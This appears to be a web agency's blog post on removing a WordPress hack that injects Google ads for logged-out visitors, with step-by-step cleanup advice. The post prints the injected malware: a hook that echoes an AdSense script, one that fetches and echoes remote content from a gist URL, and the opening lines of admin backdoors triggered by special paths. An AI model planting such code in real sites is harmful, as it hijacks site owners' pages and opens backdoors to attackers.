Recently we’ve seen a few cases of a new WordPress hack which manages to display Google ads on every page of a website, but only for logged-out users. You may also experience other mysterious symptoms such as pages being moved to the trash.
While it’s not particularly malicious, it’s still annoying and can undermine the credibility of your organization, in addition to revealing security problems with your website.
For these reasons, we strongly recommend you act immediately to secure your site.
Below, I will outline how the hack works, share some code examples, and then explain the solution to this frustrating problem.
*Note: as with any time you are making changes to your website, I strongly recommend backing up both your website files and database before proceeding with anything. If you mess something up, it may be your only method of restoring the site unless you have quality website hosting.
Description of this WordPress Hack
The most obvious symptom of this particular hack is that your website will display ads on every page, but only to logged-out users. This is a common technique used to prevent site owners from realizing that their website has been hacked, since they are typically logged-in and may not see the ads.
The code added to the site includes this line, which prevents anything from being added if the current user is logged-in:
1 |
if (!is_user_logged_in() || !current_user_can('administrator')) { |
Curiously, this code appears to be redundant. Basically, it checks to make sure the current user is neither logged-in nor an administrator. But you can’t be an administrator if you aren’t logged-in.
Often, this type of code is not written by truly-talented individuals, or potentially humans at all. It may have sort of “evolved” that way or been written by AI. But I digress.
We have found two specific sections of code, both of which lead to the same thing: Google ads in the footer for logged-out users. Here are both of those snippets of code.
1 2 3 4 5 6 |
function wp_code() { if (!is_user_logged_in() || !current_user_can('administrator')) { echo '<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9156332944666352" crossorigin="anonymous"></script>'; } } add_action('wp_head', 'wp_code'); |
This first one is pretty direct and leaves no question as to what it is trying to do.
This second one does the same thing, but is obfuscated by hosting the code at Github.
1 2 3 4 5 6 7 8 |
function wp_config_trigger() { if (!is_user_logged_in() || !current_user_can('administrator')) { $code_url = 'https://gist.githubusercontent.com/mskhott/295129cc441362414e5b54ea5896a4d7/raw/71a1177b65b476f2b7e9cdbed374a3af993fa6c7/gistfile1.txt'; $code = file_get_contents($code_url); echo $code; } } add_action('wp_head', 'wp_config_trigger'); |
We found these snippets of code in two places:
- The end of core WordPress files in the site root (wp-config.php and wp-load.php, in our cases)
- The end of WordPress plugin files (custom plugins in our case, but it could be any plugin)
The result of both was the same. This script was added somewhere in the site footer, which then loaded Google ads:
1 |
<script data-jc="26" src="https://tpc.googlesyndication.com/pagead/js/r20240605/r20110914/client/load_preloaded_resource_fy2021.js" async="" data-jc-version="r20240605"></script> |
Note that if you were to inspect the ads code, you would see something other than the above. That’s because the above code basically loads external code from Google, and then adds a bunch more HTML and other scripts to the site.
In addition to the Google ads, we also determined that, for whatever reason, this hack would randomly delete website pages and we’d find them in the trash. This caused problems with our menu and also some confusion when content seemed to go missing.
We also found that code had been added to our theme’s functions.php file which gave the attackers a backdoor to keep adding their Google Ads code over and over again, even after being removed. This backdoor allowed anyone to log in as an admin by simply accessing the path /functions on our site. Here is there start of the code (I’m not sharing the full code because I don’t want malicious actors to be able to re-use it):
1 2 3 4 |
add_action('init', 'discreet_activation'); function discreet_activation(){ if ($_SERVER['REQUEST_URI'] == '/functions') { |
An alternative code block we found from the same hack starts like this:
1 2 3 4 |
add_action('init', 'function_trigger'); function function_trigger() { if ($_SERVER['REQUEST_URI'] == '/init-task') { if (!is_user_logged_in()) { |
Solution to Google Ad Hack
The solution to this hack is similar to most hacks, with a few extra steps. In general, the first step is to secure the site, then restore things as-needed.
Note that if you have quality website hosting and can easily restore your site from a backup of a time when you know there were no issues, that’s probably your safest bet. Then you can simply update all of your plugins and run some security scans to prevent the hack from happening again.
However, if you don’t have that as an option (either because your hosting is bad or because too much has changed on your site to go back), here is how I would remove the hack.
- Replace all WordPress core files (Dashboard -> Updates -> Reinstall Version x.x.x should work, although doing it manually is better)
- Update all of your plugins, theme files, and WordPress itself to their newest versions (make sure you have active licenses to premium plugins and themes so that you can properly update them)
- Install and activate the WordFence plugin and run a scan of your site
- Once that has finished, review the results of the scan. Restore original versions of WordPress and core files and remove any unnecessary, infected files
- If any plugins have been identified as abandoned, you should probably deactivate and delete them (make other arrangements for their functionality, if necessary. Consider running a plugin audit to help you decide what to do)
- Search the content of all files in your site for “googlesyndication” and “gist.githubusercontent.com” – there are a variety of ways to search file contents. Perhaps your hosting has a tool for this. If you have no other options, you can use either SSH to search through the files, or download the site using FTP and search locally
- If you’ve found any instances of those strings, check to make sure this isn’t code that’s adding the ads. If it is, you’ll want to remove that part of the code
- Inspect all admin users on the website, and delete any that aren’t needed or are suspicious
- Search your theme’s functions.php file and check for the “discreet_activation” function. Remove it, if found. You may also want to search your whole site using SSH for this script as well.
- Reset all admin passwords to ensure attackers don’t have access via one of them
- Run one final WordFence scan to ensure your site is now secure
- Check the trash for pages and posts and restore any that should be active
Once you’ve completed all of these steps, you should have removed the code that adds the Google ads to your footer, in addition to the original vulnerability that led to your site being hacked.
One final note: I hesitate to add this, but I think it might help people.
You can hide the Google ads section simply by adding the following code to your theme’s style.css:
1 2 3 |
.google-auto-placed { display: none; } |
The only issue here is that if you do this, you might not even notice you’ve been hacked. It would simply hide the symptom.
But it might be a good idea to add this in if you are having trouble pinpointing where it’s coming from. Then at least nobody will see the ads until you’ve figured out how to solve it.
It’s quick and dirty but works!
Conclusion: this is far from the worst that could happen, so stay secure
As far as website hacks go, this one is actually pretty tame. It just displays legitimate Google ads, as opposed to offensive content or sending people to shady website and infecting them with malware.
Consider yourself lucky!
But you should take this as a warning. If you just got hacked, you need to start taking things more seriously.
In the future, you need to make absolutely sure that you are updating all plugins and themes and WordPress core files regularly. Delete abandoned plugins and themes. Regularly update passwords. Use a security plugin and quality, secure hosting.
This time it was just some harmless ads. Next time, your visitors may get hacked themselves or see wildly offensive content. Or worse! Their credit card information could be stolen and you could be liable for it.
If you need help dealing with this hack, or if you’d like us to review your site and make sure it is secure, please use the form to reach out below and we’ll reach out right away.